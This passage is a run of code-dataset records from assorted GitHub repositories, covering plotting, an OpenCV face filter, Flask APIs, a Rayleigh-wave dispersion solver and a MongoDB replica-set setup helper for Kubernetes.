country\n\ncom2=df2.groupby('Country').agg({'Value-INR-2011-12':'sum'})\n\ncom1=com1.reset_index()\t\t\t\t\t\t#resettin index of both\ncom2=com2.reset_index()\n\n#for import\n\n\ny=com1['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='y',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Import histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image9.jpg', bbox_inches='tight')\nplt.clf()\n\n#for export\n\n\ny=com2['Value-INR-2011-12']\n\n\n\nplt.hist(y , color='b',histtype='bar', rwidth=0.7)\n#plt.xticks(x, com1['Commodity'],rotation='vertical')\nplt.title('Export 
histogram of commodity of year 2011-12')\n\nplt.xlabel('Range of value')\nplt.ylabel('Number of countries ')\nplt.savefig('image10.jpg', bbox_inches='tight')\nplt.clf()\n\n\n#table to latex file\ntea1=tea1.reset_index()\t\ntea1.to_latex(writer)\n","repo_name":"avais25/Software-Lab-CS699","sub_path":"lab-9-pyplot-latex/figures.py","file_name":"figures.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26864442167","text":"# coding=utf-8\n# import numpy as np\nimport cv2\n\ndef resize_image(image, scale_percent=50):\n rows, cols = image.shape[:2]\n width = int(cols * scale_percent / 100)\n height = int(rows * scale_percent / 100)\n dim = (width, height)\n image = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n return image\n\ndef put_object(img,object, x, y, adjx=15, adjy=15):\n obj_rows, obj_cols = object.shape[:2]\n roi_img = img[(y-adjy):(y-adjy)+obj_rows, (x-adjx):(x-adjx)+obj_cols] \n roi_img [object < [150,150,150]] = object [object < [150,150,150]] \n return img\n \n# ==========================================================================\nface_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('../classificadores/haarcascade_eye.xml')\nmouth_cascade = cv2.CascadeClassifier(\n '../classificadores/haarcascade_mcs_mouth.xml')\n# ==========================================================================\n\nimg = cv2.imread('face.jpg')\nimg = resize_image(img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nmoustache = cv2.imread('moustache_w.png')\nmoustache = resize_image(moustache, 30)\n\n\nglasses = cv2.imread('sungalsses_w.png')\nglasses = resize_image(glasses, 30)\n\nfaces = face_cascade.detectMultiScale(gray)\nfor (x, y, w, h) in faces:\n # cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n roi_gray = gray[y:y+h, x:x+w]\n roi_color = img[y:y+h, x:x+w]\n\n eyes = eye_cascade.detectMultiScale(roi_gray, 1.1, 10) \n for (ex, ey, ew, eh) in eyes:\n roi_color = put_object(roi_color, glasses, ex, ey, 14, -10)\n break\n # cv2.rectangle(roi_color, (ex, ey), (ex+ew, ey+eh), (0, 255, 0), 2)\n \n\n mouth = mouth_cascade.detectMultiScale(roi_gray, 2.0, 20)\n for (mx, my, mw, mh) in mouth:\n roi_color = put_object(roi_color, moustache, mx, my, 15,15)\n # cv2.rectangle(roi_color, (mx, my), (mx+mw, my+mh), (0, 0, 255), 2)\n # break\n\ncv2.imshow('Turing', img)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"heloisaGuimaraes/tarefas-processamento-de-imagens-ifma","sub_path":"Aula 13/Filtro Deteccao Face/Exemplo_Faces.py","file_name":"Exemplo_Faces.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35200055455","text":"from __future__ import print_function\nfrom distutils.core import setup, Command\nimport sys\n\n# This is a hack in order to get the package name to be different when\n# building an RPM file. When 'setup.py bdist_rpm' is called, it invokes\n# setup.py twice more, with these command lines:\n# ['setup.py', 'build']\n# ['setup.py', 'install', '-O1', '--root=/home/eric/local/toposort/build/bdist.linux-i686/rpm/BUILDROOT/python-toposort-0.1-1.i386', '--record=INSTALLED_FILES']\n# It's only on the original call (when bdist_rpm is in sys.argv) that\n# I adjust the package name. With Python 2.7, that's enough. 
I'm not\n# sure about 3.x.\n\nname = 'toposort'\nif 'bdist_rpm' in sys.argv:\n name = 'python{0}-{1}'.format('' if sys.version_info.major == 2 else '3', name)\n\n\n# run our tests\nclass PyTest(Command):\n user_options = []\n def initialize_options(self):\n pass\n def finalize_options(self):\n pass\n def run(self):\n import sys, subprocess\n tests = [('test suite', ['-m', 'test.test_toposort']),\n ]\n if sys.hexversion >= 0x03000000:\n # Skip doctests for python < 3.0. They use set literal reprs, which\n # are different in 2.7. Testing under 3.x is good enough.\n tests.append(('doctests', ['-m' 'doctest', 'README.txt']))\n for name, cmds in tests:\n print(name)\n errno = subprocess.call([sys.executable] + cmds)\n if errno != 0:\n raise SystemExit(errno)\n print('test complete')\n\n\nsetup(name=name,\n version='1.4',\n url='https://bitbucket.org/ericvsmith/toposort',\n author='Eric V. Smith',\n author_email='eric@trueblade.com',\n description='Implements a topological sort algorithm.',\n long_description=open('README.txt').read() + '\\n' + open('CHANGES.txt').read(),\n classifiers=['Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n ],\n license='Apache License Version 2.0',\n py_modules=['toposort'],\n\n cmdclass = {'test': PyTest},\n )\n","repo_name":"tdrhq/bark","sub_path":"toposort-1.4/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"694015899","text":"import flask\nfrom flask import request, jsonify\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n# Test data\nproducts = {'cycling': ['helmet','bike','wheels'],\n 'skiing': ['skis','poles'],\n 'running':['shoes','t-shirt','socks'],\n 'swimming':['bathing suits','swimming cap']}\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return '''
<h1>Sports Equipment Shop</h1>\n<p>An API for a test project.</p>'''\n\n\n@app.route('/api/v1/resources/products/all', methods=['GET'])\ndef api_all():\n    return jsonify(products)\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return \"
<h1>404</h1><p>The resource could not be found.</p>
    \", 404\n\n@app.route('/api/v1/resources/products/all_categories', methods=['GET'])\ndef api_all_categories():\n results=list(products.keys())\n return jsonify(results)\n\n\n@app.route('/api/v1/resources/products/', methods=['GET', 'POST', 'DELETE'])\ndef api_category(category):\n if request.method==\"GET\":\n if category in products.keys():\n results = products[category]\n return jsonify(results)\n else:\n return page_not_found(404)\n elif request.method==\"POST\":\n products[category]=[]\n elif request.method==\"DELETE\":\n if category not in products.keys():\n return page_not_found(404)\n else:\n del products[category]\n return jsonify(products)\n\n\n@app.route('/api/v1/resources/products//', methods=['POST', 'DELETE'])\ndef api_product(category, product):\n if request.method==\"POST\":\n if category in products.keys():\n category_products=products[category]\n if product in category_products:\n return \"Product already in category.\"\n else:\n category_products.append(product)\n products[category]=category_products\n else:\n new_category={category:[product]}\n products.update(new_category)\n elif request.method==\"DELETE\":\n if category not in products.keys():\n return page_not_found(404)\n category_products=products[category]\n if product not in category_products:\n return page_not_found(404)\n else:\n category_products.remove(product)\n products[category]=category_products\n return jsonify(products)\n\n@app.route('/api/v1/resources/products//', methods=['PUT'])\ndef api_update_category(category,new_category):\n if category not in products.keys():\n return page_not_found(404)\n else:\n products[new_category]=products.pop(category)\n return jsonify(products)\n\n@app.route('/api/v1/resources/products///', methods=['PUT'])\ndef api_update_product(category, product, new_product):\n if category not in products.keys():\n return page_not_found(404)\n category_products=products[category]\n if product not in category_products:\n return page_not_found(404)\n else:\n category_products[category_products.index(product)]=new_product\n products[category]=category_products\n return jsonify(products)\n\napp.run()","repo_name":"peeterliik/product_api","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16938837170","text":"from handlers.main_handler import BaseHandler\nimport handlers.main_handler\n\nrecommender = None\n\nclass RankingHandler(BaseHandler):\n\n @staticmethod\n def obfuscate_rate(rate, lower=True, k=5):\n hundred_rate = int(rate * 100)\n if lower:\n return hundred_rate // k * k\n else:\n return (hundred_rate + k - 1) // k * k\n\n def get(self):\n business_config, data_provider = handlers.main_handler.get_context()\n users = data_provider.exesql(\"\"\"\n SELECT id, name from users where ignored == 0 and blocked == 0\n \"\"\")\n\n user_to_gold_answer_correct_rate = {user_id: user.correct_rate_and_count[0] for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_gold_answer_count = {user_id: user.correct_rate_and_count[1] for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_total_answer_count = {user_id: user.answer_count for user_id, user in recommender.users.items() if not user.ignored and not user.blocked}\n user_to_total_answer_count_max = max(user_to_total_answer_count.items(), key=lambda x: x[1])[1]\n user_to_gold_answer_score = []\n for user_id in 
user_to_gold_answer_count:\n count = user_to_gold_answer_count[user_id]\n correct_rate = user_to_gold_answer_correct_rate[user_id]\n total_count = user_to_total_answer_count[user_id]\n if count >= business_config[\"ranking_min_answers\"]:\n w = business_config[\"correct_rate_weight\"]\n score = 1 / (w * 1 / correct_rate + (1-w) * user_to_total_answer_count_max / total_count) if total_count else 0\n user_to_gold_answer_score.append((user_id, score, correct_rate, count))\n user_to_gold_answer_score.sort(key=lambda x: x[1], reverse=True)\n user_to_name = {id: name for id, name in users}\n\n current_user_id = self.get_current_user_id()\n rank_data = []\n for i, (id, _, rate, count) in enumerate(user_to_gold_answer_score[0: business_config[\"ranking_top_n\"]]):\n is_current_user = current_user_id == id\n rank_data.append((i + 1, user_to_name[id], self.obfuscate_rate(rate), is_current_user, count))\n\n if current_user_id in [a[0] for a in user_to_gold_answer_score]:\n display_current_user_gold_rate = True\n current_user_gold_rate = self.obfuscate_rate(\n user_to_gold_answer_correct_rate[current_user_id])\n try:\n current_user_gold_rate_ranking = next(t[2] for t in user_to_gold_answer_score if t[0] == current_user_id)\n except StopIteration:\n import pdb; pdb.set_trace()\n current_user_gold_rate_percentage = max(self.obfuscate_rate(current_user_gold_rate_ranking / len(user_to_total_answer_count), lower=False),\n 1)\n\n else:\n display_current_user_gold_rate = False\n current_user_gold_rate = None\n current_user_gold_rate_percentage = None\n\n\n feed_dict = {\n 'is_admin': self.check_authority(49999),\n 'data': rank_data,\n 'display_current_user_gold_rate': display_current_user_gold_rate,\n 'current_user_gold_rate': current_user_gold_rate,\n 'current_user_gold_rate_percentage': current_user_gold_rate_percentage,\n }\n\n self.render(\"ranking.html\", **feed_dict)\n","repo_name":"THU-KEG/ECTE","sub_path":"platform/handlers/ranking_handler.py","file_name":"ranking_handler.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3062778828","text":"class Student():\n '''\n Класс Student включает в себя информацию о студентах: имя, фамилия, номер группы и список оценок\n '''\n\n def __init__(self, first_name: str, last_name: str, group: str):\n self.first_name = first_name\n self.last_name = last_name\n self.group = group\n self.marks = []\n\n def add_mark(self):\n '''\n Функция добавляет оценку в список оценок студента, если она больше 0 и меньше 11\n '''\n\n if self.marks == int and 0 < self.marks < 11:\n self.marks.append(marks)\n print('Оценка добавлена')\n else:\n print('Введите верный формат оценки от 1 до 10')\n\n def get_average_mark(self):\n '''\n Функция считает средний балл студента\n '''\n\n if len(self.marks) == 0:\n return 0\n else:\n return sum(self.marks) / len(self.marks)\n\n def get_scolarship(self):\n '''\n Функция возращает размер стипендии студента\n '''\n\n if self.get_average_mark() >= 5:\n return 'Этот студент получает стипендию в размере 500 рублей'\n else:\n return 'Этот студент получает стипендию в размере 150 рублей'\n\n\nclass Aspirant(Student):\n '''\n Класс Aspirant - наследник Student, включает в себя информацию о студентах:\n имя, фамилия, номер группы, список оценок, публикации\n '''\n\n def __init__(self, first_name: str, last_name: str, group: str, scientific_publications: str):\n self.first_name = first_name\n self.last_name = last_name\n self.group = group\n 
self.marks = []\n self.scientific_publications = scientific_publications\n\n def get_scolarship(self):\n '''\n Функция возращает размер стипендии аспиранта\n '''\n\n if self.get_average_mark() >= 5:\n return 'Этот аспирант получает стипендию в размере 700 рублей'\n else:\n return 'Этот аспирант получает стипендию в размере 250 рублей'\n\np = Student('Иван', 'Пупкин', 'П-41')\np.marks = 5, 1, 6\n\nprint('Имя: ', p.first_name)\nprint('Фамилия: ', p.last_name)\nprint('Группа: ', p.group)\nprint('Оценки: ', p.marks)\nprint (p.get_average_mark())\nprint (p.get_scolarship())\nprint()\n\na = Aspirant ('Мария', 'Шишкина', 'П-51', 'Теория атома')\na.marks = 9, 10, 8\nprint('Имя: ', a.first_name)\nprint('Фамилия: ', a.last_name)\nprint('Группа: ', a.group)\nprint('Оценки: ', a.marks)\nprint('Публикации: ', a.scientific_publications)\nprint (a.get_average_mark())\nprint (a.get_scolarship())\n","repo_name":"AnasnasiaKartashova/OOP","sub_path":"task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"ru","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70248532330","text":"def Unmanned(L, N, track):\r\n time, odometer, places = 0, 0, getPlaces(track)\r\n while odometer < L:\r\n odometer += 1\r\n time += 1\r\n if odometer in places:\r\n time = w8(time, track[places.index(odometer)])\r\n return time\r\n\r\n\r\ndef getPlaces(track):\r\n places = []\r\n for trLight in track:\r\n places.append(trLight[0])\r\n return places\r\n\r\n\r\ndef w8(time, light):\r\n count = 0\r\n curr = True\r\n while count < time:\r\n if curr:\r\n count += light[1]\r\n curr = False\r\n else:\r\n count += light[2]\r\n curr = True\r\n if curr and (count == time or count > time):\r\n return time\r\n elif not curr and count > time:\r\n return count\r\n elif not curr and count == time:\r\n return time\r\n","repo_name":"LexSteine/Fortune_favors_the_bold","sub_path":"Task14.py","file_name":"Task14.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15167526402","text":"from flask import Flask, render_template, session, escape, request, redirect, url_for\napp = Flask(__name__)\napp.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'\n\nfrom models import Classs\nfrom views import admin\n\nclasss = Classs(1, 'classname', 'teacher', 'yrleve', 'room', 'schedule', 1)\nadmin(classs.name)\n\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()","repo_name":"raidenphoenix011/EaglewatchPayroll","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38450318232","text":"from i2b2tools.helpers.utils import phi_within_range\n\n# this is mostly to be used as an example predicate\n# it works with a MergeRule to say:\n# 123\n# then merge these 3 tags as one date\n\n# this function specifically determines whether or not the above\n# situation *exists*\ndef _trigram_name_predicate(target, rule):\n \"\"\" Target is a tuple of trigrams, rule is a Rule object, which allows access to the sa. 
\"\"\"\n token1, token2, token3 = target\n token1 = phi_within_range(rule.sa, token1.start, token1.end)\n token2 = phi_within_range(rule.sa, token2.start, token2.end)\n token3 = phi_within_range(rule.sa, token3.start, token3.end)\n\n if token1 and not token2 and token3:\n if token1.name == token3.name == rule.name:\n return True\n\n return False\n","repo_name":"danlamanna/i2b2tools","sub_path":"i2b2tools/lib/rules/predicates.py","file_name":"predicates.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"27787623743","text":"# -*- mode: python -*-\r\na = Analysis(['captura2.py'],\r\n pathex=['Z:\\\\genesis\\\\captura'],\r\n hiddenimports=[],\r\n hookspath=None,\r\n runtime_hooks=None)\r\npyz = PYZ(a.pure)\r\nexe = EXE(pyz,\r\n a.scripts,\r\n a.binaries,\r\n a.zipfiles,\r\n a.datas,\r\n name='captura2.exe',\r\n debug=False,\r\n strip=None,\r\n upx=True,\r\n console=True )\r\n","repo_name":"calimacaco/pyfacil","sub_path":"captura/captura2.spec","file_name":"captura2.spec","file_ext":"spec","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9981763092","text":"# Rayleigh waves from direct integration\n# Ethan Williams - 2023/10/27\n\nimport numpy as np\nfrom copy import deepcopy\nfrom scipy.integrate import odeint\nfrom scipy.optimize import ridder\n\nclass layer:\n def __init__(self,d,vp,vs,rho):\n self.d = np.array(d)\n self.vp = np.array(vp)\n self.vs = np.array(vs)\n self.rho = np.array(rho)\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n return\n \nclass velocity_model:\n '''\n container for velocity model\n water layer is handled with:\n is_water - True or False\n h - water depth (m)\n vw - water acoustic speed (m/s)\n rw - water density (kg/m^3)\n nh - number of points to evaluate in water\n '''\n def __init__(self,d,vp,vs,rho,is_water=False,h=None,vw=None,rw=None,nh=None):\n self.nl = len(d)\n self.layers = np.array([layer(d[i],vp[i],vs[i],rho[i]) for i in range(self.nl)])\n self.nz = self.nl+1\n self.vp = np.array(vp)\n self.vs = np.array(vs)\n self.rho = np.array(rho)\n self.z = np.concatenate(([0],np.cumsum(d)))\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n self.is_water = is_water # True if water\n self.h = h # water layer thickness\n self.vw = vw # water layer sound speed\n self.rw = rw # water layer density\n self.nh = nh # number of points in water layer\n return\n\n def upsample_model(self,dz,zmax):\n '''\n upsample model or extrapolate to greater depth\n '''\n n = [int(np.ceil(l.d/dz)) for l in self.layers]\n zz = np.cumsum([l.d for l in self.layers])\n nz = np.sum(n)\n if nz<=self.nl:\n raise ValueError('Specified nz is less than number of layers...')\n vp_ = np.zeros(nz)\n vs_ = np.zeros(nz)\n ro_ = np.zeros(nz)\n z_ = np.zeros(nz)\n iz = 0\n for i,l in enumerate(self.layers):\n vp_[iz:iz+n[i]] = l.vp\n vs_[iz:iz+n[i]] = l.vs\n ro_[iz:iz+n[i]] = l.rho\n if i == 0:\n z_[iz:iz+n[i]] = np.linspace(0,l.d,n[i]+1)[:-1]\n else:\n z0 = zz[i-1]\n z_[iz:iz+n[i]] = np.linspace(z0,z0+l.d,n[i]+1)[:-1]\n iz += n[i]\n if max(z_) >= zmax:\n idz = (z_<=zmax)\n self.vp = vp_[idz]\n self.vs = vs_[idz]\n self.rho = ro_[idz]\n self.z = z_[idz]\n else:\n nfill = int(np.ceil((zmax-z_[-1])/dz))\n self.vp = np.concatenate((vp_,np.ones(nfill)*vp_[-1]),axis=0)\n self.vs = np.concatenate((vs_,np.ones(nfill)*vs_[-1]),axis=0)\n self.rho = 
np.concatenate((ro_,np.ones(nfill)*ro_[-1]),axis=0)\n self.z = np.concatenate((z_,np.linspace(z_[-1]+dz,zmax,nfill)),axis=0)\n self.nz = len(self.z)\n self.d = np.diff(self.z)\n self.mu = self.rho * self.vs**2\n self.la = self.rho * self.vp**2 - 2*self.mu\n return\n\ndef displacement_stress(y,zi,k,w,m):\n '''\n y - displacement-stress vector for Rayleigh waves\n y[0] = ux; y[1] = uz; y[2] = tx; y[3] = tz\n zi - layer depth to evaluate velocity model\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n returns dy/dz = A@y\n '''\n iz = np.argmin(abs(m.z-zi))\n ro = m.rho[iz]\n la = m.la[iz]\n mu = m.mu[iz]\n s = 4*mu*(la+mu)/(la+2*mu)\n A = np.zeros((4,4))\n A[0,:] = [0, k, 1./mu, 0]\n A[1,:] = [-k*la/(la+2*mu), 0, 0, 1./(la+2*mu)]\n A[2,:] = [s*k**2 - ro*w**2, 0, 0, k*la/(la+2*mu)]\n A[3,:] = [0, -ro*w**2, -k, 0]\n return A @ y\n\ndef integrate(k,w,m):\n '''\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n returns two eigenfunction solutions\n '''\n if k**2 <= w**2/m.vs[-1]**2:\n print('Wavenumber too large for bottom half-space')\n # Vertical wavenumbers\n va = np.sqrt(k**2 - w**2/m.vp[-1]**2)\n vb = np.sqrt(k**2 - w**2/m.vs[-1]**2)\n # Starting solution in bottom half-space\n y0a = np.array([k, va, 2*k*m.mu[-1]*va, m.mu[-1]*(k**2+vb**2)]) * np.exp(va*m.z[-1])\n y0b = np.array([vb, k, m.mu[-1]*(k**2+vb**2), 2*k*vb*m.mu[-1]]) * np.exp(vb*m.z[-1])\n # Integrate to surface\n ya = odeint(displacement_stress,y0a,m.z[::-1],args=((k,w,m)))\n yb = odeint(displacement_stress,y0b,m.z[::-1],args=((k,w,m)))\n return ya[::-1,:], yb[::-1,:]\n\ndef eigenfunction(k,w,m,just_det=False):\n '''\n k - angular wavenumber (rad/m)\n w - angular frequency (rad/s)\n m - velocity_model object\n just_det - return determinant only, or determinant + eigenfunctions\n '''\n # Integrate from bottom half space to surface of solid Earth\n ya,yb = integrate(k,w,m)\n # If no water layer, return determinant and eigenfunction\n if not m.is_water:\n det = ya[0,2]*yb[0,3] - yb[0,2]*ya[0,3]\n y = ya + (-ya[0,2]/yb[0,2]) * yb\n y /= y[0,1] # normalize\n #det = y[0,3]\n z = m.z\n else: # If water layer, append propagator matrix first\n ew = np.emath.sqrt(w**2/m.vw**2 - k**2)\n dh = np.linspace(0,m.h,m.nh)[::-1]\n yaw = np.zeros((m.nh,4),dtype=np.complex_)\n ybw = np.zeros((m.nh,4),dtype=np.complex_)\n yaw[:,1] = np.cos(ew*dh)*ya[0,1] - (ew/m.rw/w**2)*np.sin(ew*dh)*ya[0,3]\n yaw[:,3] = (w**2*m.rw/ew)*np.sin(ew*dh)*ya[0,1] + np.cos(ew*dh)*ya[0,3]\n yaw[:,0] = (k/m.rw/w**2)*yaw[:,3]\n ybw[:,1] = np.cos(ew*dh)*yb[0,1] - (ew/m.rw/w**2)*np.sin(ew*dh)*yb[0,3]\n ybw[:,3] = (w**2*m.rw/ew)*np.sin(ew*dh)*yb[0,1] + np.cos(ew*dh)*yb[0,3]\n ybw[:,0] = (k/m.rw/w**2)*ybw[:,3]\n det = np.real(ya[0,2]*ybw[0,3] - yb[0,2]*yaw[0,3])\n ys = ya + (-ya[0,2]/yb[0,2]) * yb\n yw = yaw + (-ya[0,2]/yb[0,2]) * ybw\n y = np.concatenate((yw,ys),axis=0)\n y /= ys[0,1] # normalize\n y = np.real(y)\n z = np.concatenate((-1*dh,m.z))\n if just_det:\n return det\n else:\n return det, y, z\n\ndef dispersion(f,m,nb=10,nz=1000,zfac=5,all_modes=False,adaptive_depth=False,return_eig=False,return_model=False):\n '''\n get phase velocity at frequency\n f - single frequency (Hz)\n m - velocity_model object\n nb - number of intervals for root search\n smaller (e.g. 10) = faster, but higher modes may be patchy\n larger (e.g. 
100) = slower, but reliable to high frequencies\n nz - number of depth points (if using adaptive_depth)\n zfac - number of wavelengths to truncate model in depth\n all_modes - just return first mode if False\n adaptive_depth - upsample or extend model (important for low-freq stability)\n return_eig - also return eigenfunctions\n return_model - also return adapted velocity model\n '''\n w = 2*np.pi*f\n M = deepcopy(m)\n # bounds for search\n kmin = 1.01*(w/M.vs[-1])\n kmax = w/(0.7*np.min(M.vs))\n # resample/cut/extend velocity model\n if adaptive_depth:\n zmax = zfac*(2*np.pi/kmax)\n M.upsample_model(zmax/nz,zmax)\n # recalculate kmin\n kmin = 1.01*(w/M.vs[-1])\n # get brackets for root search\n kb = np.linspace(kmin,kmax,nb)\n dets = np.zeros(nb)\n for ik,k in enumerate(kb):\n dets[ik] = eigenfunction(k,w,M,just_det=True)\n # get brackets with sign change\n diff = np.diff(np.sign(dets))\n brac = np.argwhere(abs(diff)>1).flatten()\n # find root(s)\n if all_modes:\n ks = []\n for ib in range(len(brac)):\n a = kb[brac[ib]]\n b = kb[brac[ib]+1]\n k = ridder(eigenfunction,a,b,(w,M,True))\n ks.append(k)\n ks = np.array(ks)[::-1]\n cp = w/ks\n elif len(brac)>0:\n a = kb[brac[-1]]\n b = kb[brac[-1]+1]\n k = ridder(eigenfunction,a,b,(w,M,True))\n cp = w/k\n else:\n cp = np.nan\n # return eigenfunctions\n if return_eig:\n dh = M.h/M.nh\n zz = np.concatenate((-1*np.linspace(dh,M.h,M.nh)[::-1],M.z),axis=0)\n if all_modes:\n ys = np.zeros((len(ks),len(zz),4))\n for ik,k in enumerate(ks):\n _,y,z = eigenfunction(k,w,M,just_det=False)\n for j in range(4):\n ys[i,:,j] = np.interp(zz,z,y[:,j])\n else:\n ys = np.zeros((len(zz),4))\n _,y,z = eigenfunction(k,w,M,just_det=False)\n for j in range(4):\n ys[:,j] = np.interp(zz,z,y[:,j])\n if return_model:\n return cp, ys, zz, M\n else:\n return cp, ys, zz\n else:\n if return_model:\n return cp, M\n else:\n return cp\n\n# TO DO:\n# - add energy integral and group velocity functions\n\n","repo_name":"ethanfwilliams/surface_wave_tools","sub_path":"direct_integration.py","file_name":"direct_integration.py","file_ext":"py","file_size_in_byte":8741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41742025502","text":"import logging\nimport json\nfrom base64 import b64decode\n\nfrom kubernetes.client.apis import core_v1_api\nfrom kubernetes.stream import stream\n\nfrom .kubernetes_helpers import read_secret\n\n\nDNS_SUFFIX = 'svc.cluster.local'\n\n\ndef get_member_hostname(member_id, cluster_name, namespace, dns_suffix):\n return '{}-{}.{}.{}.{}'.format(\n cluster_name, member_id, cluster_name, namespace, dns_suffix)\n\n\ndef check_if_replicaset_needs_setup(cluster_object, dns_suffix=DNS_SUFFIX):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n\n pod_name = '{}-0'.format(name)\n exec_cmd = [\n 'mongo',\n 'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', 'rs.status()']\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n # If the replica set is not initialized yet, we initialize it\n if '\"ok\" : 0' in exec_resp and \\\n '\"codeName\" : \"NotYetInitialized\"' in exec_resp:\n initiate_replicaset(cluster_object, dns_suffix=dns_suffix)\n\n # If we can get the replica set status without 
authenticating as the\n # admin user first, we have to create the users\n if '\"ok\" : 1' in exec_resp:\n create_users(cluster_object)\n\n\ndef initiate_replicaset(cluster_object, dns_suffix=DNS_SUFFIX):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n try:\n replicas = cluster_object['spec']['mongodb']['replicas']\n except KeyError:\n replicas = 3\n\n _rs_config = {\n '_id': name,\n 'version': 1,\n 'members': []\n }\n\n for _id in range(replicas):\n _member_hostname = get_member_hostname(\n _id, name, namespace, dns_suffix)\n _rs_config['members'].append({\n '_id': _id,\n 'host': _member_hostname})\n\n pod_name = '{}-0'.format(name)\n exec_cmd = [\n 'mongo',\n 'localhost:27017/admin',\n '--ssl',\n '--sslCAFile', '/etc/ssl/mongod/ca.pem',\n '--sslPEMKeyFile', '/etc/ssl/mongod/mongod.pem',\n '--eval', 'rs.initiate({})'.format(json.dumps(_rs_config))]\n exec_resp = stream(core_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=exec_cmd,\n container='mongod',\n stderr=True,\n stdin=False,\n stdout=True,\n tty=False)\n\n if '{ \"ok\" : 1 }' in exec_resp:\n logging.info('initialized replicaset {} in ns/{}'.format(\n name, namespace))\n elif '\"ok\" : 0' in exec_resp and \\\n '\"codeName\" : \"NodeNotFound\"' in exec_resp:\n logging.info('waiting for {} {} replicaset members in ns/{}'.format(\n replicas, name, namespace))\n logging.debug(exec_resp)\n else:\n logging.error('error initializing replicaset {} in ns/{}\\n{}'.format(\n name, namespace, exec_resp))\n\n\ndef create_users(cluster_object):\n core_api = core_v1_api.CoreV1Api()\n name = cluster_object['metadata']['name']\n namespace = cluster_object['metadata']['namespace']\n try:\n replicas = cluster_object['spec']['mongodb']['replicas']\n except KeyError:\n replicas = 3\n\n admin_credentials = read_secret(\n '{}-admin-credentials'.format(name), namespace)\n admin_username = b64decode(\n admin_credentials.data['username']).decode('utf-8')\n admin_password = b64decode(\n admin_credentials.data['password']).decode('utf-8')\n\n monitoring_credentials = read_secret(\n '{}-monitoring-credentials'.format(name), namespace)\n monitoring_username = b64decode(\n monitoring_credentials.data['username']).decode('utf-8')\n monitoring_password = b64decode(\n monitoring_credentials.data['password']).decode('utf-8')\n\n mongo_command = '''\n admin = db.getSiblingDB(\"admin\")\n admin.createUser(\n {{\n user: \"{}\",\n pwd: \"{}\",\n roles: [ {{ role: \"root\", db: \"admin\" }} ]\n }}\n )\n admin.auth(\n \"{}\",\n \"{}\"\n )\n admin.createUser(\n {{\n user: \"{}\",\n pwd: \"{}\",\n roles: [ {{ role: \"clusterMonitor\", db: \"admin\" }} ]\n }}\n )\n '''.format(\n admin_username, admin_password,\n admin_username, admin_password,\n monitoring_username, monitoring_password)\n\n for i in range(replicas):\n pod_name = '{}-{}'.format(name, i)\n exec_cmd = [\n 'mongo',\n 